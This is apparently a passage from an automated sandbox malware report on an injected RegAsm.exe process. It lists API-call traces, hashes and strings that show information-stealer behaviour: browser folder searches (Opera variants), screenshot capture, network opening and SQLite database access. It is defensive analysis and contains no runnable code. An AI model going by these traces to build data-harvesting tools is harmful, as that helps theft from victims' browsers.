                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFileH_prolog
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3244726999-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405EA1,00000000,00000000), ref: 00405AFE
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405EA1,00000000,00000000), ref: 00405B2A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040C486
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040B20D: _EH_prolog.MSVCRT ref: 0040B212
                                                                                                                                                                                                  • Part of subcall function 0040B20D: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B265
                                                                                                                                                                                                  • Part of subcall function 0040B20D: memcmp.MSVCRT ref: 0040B2A3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2375657845-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00414467
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0041448D
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 004144A4
                                                                                                                                                                                                • memset.MSVCRT ref: 004144BB
                                                                                                                                                                                                • memset.MSVCRT ref: 004144C9
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425798), ref: 004144E7
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042579C), ref: 00414501
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414525
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,004254AE), ref: 00414536
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0041455C
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414570
                                                                                                                                                                                                • memset.MSVCRT ref: 00414582
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414594
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 004145CD
                                                                                                                                                                                                • memset.MSVCRT ref: 004145E2
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004145F7
                                                                                                                                                                                                • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041461A
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041471C
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 0041474D
                                                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00414870
                                                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 00414881
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                • API String ID: 264515753-332874205
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00415320
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00415340
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00415357
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425854), ref: 00415374
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425858), ref: 0041538E
                                                                                                                                                                                                • wsprintfA.USER32 ref: 004153B2
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,004254BF), ref: 004153C3
                                                                                                                                                                                                • wsprintfA.USER32 ref: 004153E0
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • wsprintfA.USER32 ref: 004153F4
                                                                                                                                                                                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00415407
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00415433
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00425870), ref: 00415445
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00415455
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00425874), ref: 00415467
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0041547B
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00415616
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00415625
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                                                                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                • API String ID: 3254224521-445461498
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004102ED
                                                                                                                                                                                                • memset.MSVCRT ref: 00410313
                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00410349
                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00410356
                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0041035D
                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00410367
                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00410378
                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00410383
                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041039F
                                                                                                                                                                                                • GlobalFix.KERNEL32(?), ref: 004103FD
                                                                                                                                                                                                • GlobalSize.KERNEL32(?), ref: 00410409
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004043CF: _EH_prolog.MSVCRT ref: 004043D4
                                                                                                                                                                                                  • Part of subcall function 004043CF: lstrlenA.KERNEL32(00000000), ref: 00404443
                                                                                                                                                                                                  • Part of subcall function 004043CF: StrCmpCA.SHLWAPI(?,004249DF,004249DB,004249D3,004249CF,004249CE), ref: 004044C6
                                                                                                                                                                                                  • Part of subcall function 004043CF: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044E6
                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00410483
                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0041049E
                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004104A5
                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 004104AF
                                                                                                                                                                                                • CloseWindow.USER32(00000000), ref: 004104B6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                                                                                                                                • String ID: image/jpeg
                                                                                                                                                                                                • API String ID: 3067874393-3785015651
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00414ED7
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00414EEF
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00414EF6
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414F0E
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00414F25
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425838), ref: 00414F42
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042583C), ref: 00414F5C
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414F80
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00411CF6: _EH_prolog.MSVCRT ref: 00411CFB
                                                                                                                                                                                                  • Part of subcall function 00411CF6: memset.MSVCRT ref: 00411D1C
                                                                                                                                                                                                  • Part of subcall function 00411CF6: memset.MSVCRT ref: 00411D2A
                                                                                                                                                                                                  • Part of subcall function 00411CF6: lstrcat.KERNEL32(?,00000000), ref: 00411D56
                                                                                                                                                                                                  • Part of subcall function 00411CF6: lstrcat.KERNEL32(?), ref: 00411D74
                                                                                                                                                                                                  • Part of subcall function 00411CF6: lstrcat.KERNEL32(?,?), ref: 00411D88
                                                                                                                                                                                                  • Part of subcall function 00411CF6: lstrcat.KERNEL32(?), ref: 00411D9B
                                                                                                                                                                                                  • Part of subcall function 00411CF6: StrStrA.SHLWAPI(00000000), ref: 00411E35
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 004150AF
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004150BE
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004150E3
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 004150F6
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 004150FF
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0041510C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                                                                                                                                • String ID: %s\%s$%s\*
                                                                                                                                                                                                • API String ID: 398052587-2848263008
                                                                                                                                                                                                • Opcode ID: b30466ffbc79659b2e2bfa2b9986d482defda78eb0016d9cb88518bef5779368
                                                                                                                                                                                                • Instruction ID: bef94c3f4399ae371824a42a0da6f2abc892f3b013e021df97c8c0e4b108b331
                                                                                                                                                                                                • Opcode Fuzzy Hash: b30466ffbc79659b2e2bfa2b9986d482defda78eb0016d9cb88518bef5779368
                                                                                                                                                                                                • Instruction Fuzzy Hash: 36818C71D00258AEDF00EBE5DC49FEEBBB9AF19304F00446AF505B3191DB785A58CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00414B33
                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414B56
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00414B6D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425820), ref: 00414B8F
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00425824), ref: 00414BA9
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414BDE
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00414BF1
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414C05
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414C15
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00425828), ref: 00414C27
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414C3B
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00414CD5
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00414CE4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                • String ID: %s\%s
                                                                                                                                                                                                • API String ID: 2282932919-4073750446
                                                                                                                                                                                                • Opcode ID: d17ec3c26600bd52f5ef96e5e4cbc8889da4d0dd2681947c91fd2a1080613eb5
                                                                                                                                                                                                • Instruction ID: 05727ecc9d7f33b886483cb8d764c8e7b40b9ffdb98e9113d0f3f5e3cb310351
                                                                                                                                                                                                • Opcode Fuzzy Hash: d17ec3c26600bd52f5ef96e5e4cbc8889da4d0dd2681947c91fd2a1080613eb5
                                                                                                                                                                                                • Instruction Fuzzy Hash: CB513071900128ABCF11EBB1DD49EDE7B7DAB49314F0004AAF505E3151E7389755CFA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00409FC3
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00424C06,00000000,?,00000000), ref: 0040A042
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E68), ref: 0040A09C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E6C), ref: 0040A0B6
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera,00424C13,00424C12,00424C0F,00424C0E,00424C0B,00424C0A,00424C07), ref: 0040A149
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A15D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A171
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                • API String ID: 3869166975-536343317
                                                                                                                                                                                                • Opcode ID: 3ce71d429e05e21809e9ad90c95f306b7a74d996af67ac7e37ae5550a3f075c4
                                                                                                                                                                                                • Instruction ID: e1e732d37fd29b0b379b404ee0475555f18a85fffeb7a532c0721a1af017c2f0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ce71d429e05e21809e9ad90c95f306b7a74d996af67ac7e37ae5550a3f075c4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A42C270900288EADF44EBE6C955BDDBBB4AF19308F4044AEE445732C2DB781B1CDB66
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 3e318108a7eb1c2b47e2f8dd51134a2ec12b1ac5a37419c8402c4cbc62f5f262
                                                                                                                                                                                                • Instruction ID: 976cf6f7c60e5720a38eaf4cbfd8af605e438272e62017ee18e803ca77664f98
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e318108a7eb1c2b47e2f8dd51134a2ec12b1ac5a37419c8402c4cbc62f5f262
                                                                                                                                                                                                • Instruction Fuzzy Hash: FD1204B49047419BF7208F24CE45BD77BEABF55318F04492CE89987282E776E449CBA3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
                                                                                                                                                                                                • API String ID: 0-3496276579
                                                                                                                                                                                                • Opcode ID: bd7877f27da4e12b6a7fa398ac2b849e26e184e158dc6f262aeaf5f0e1ee4aec
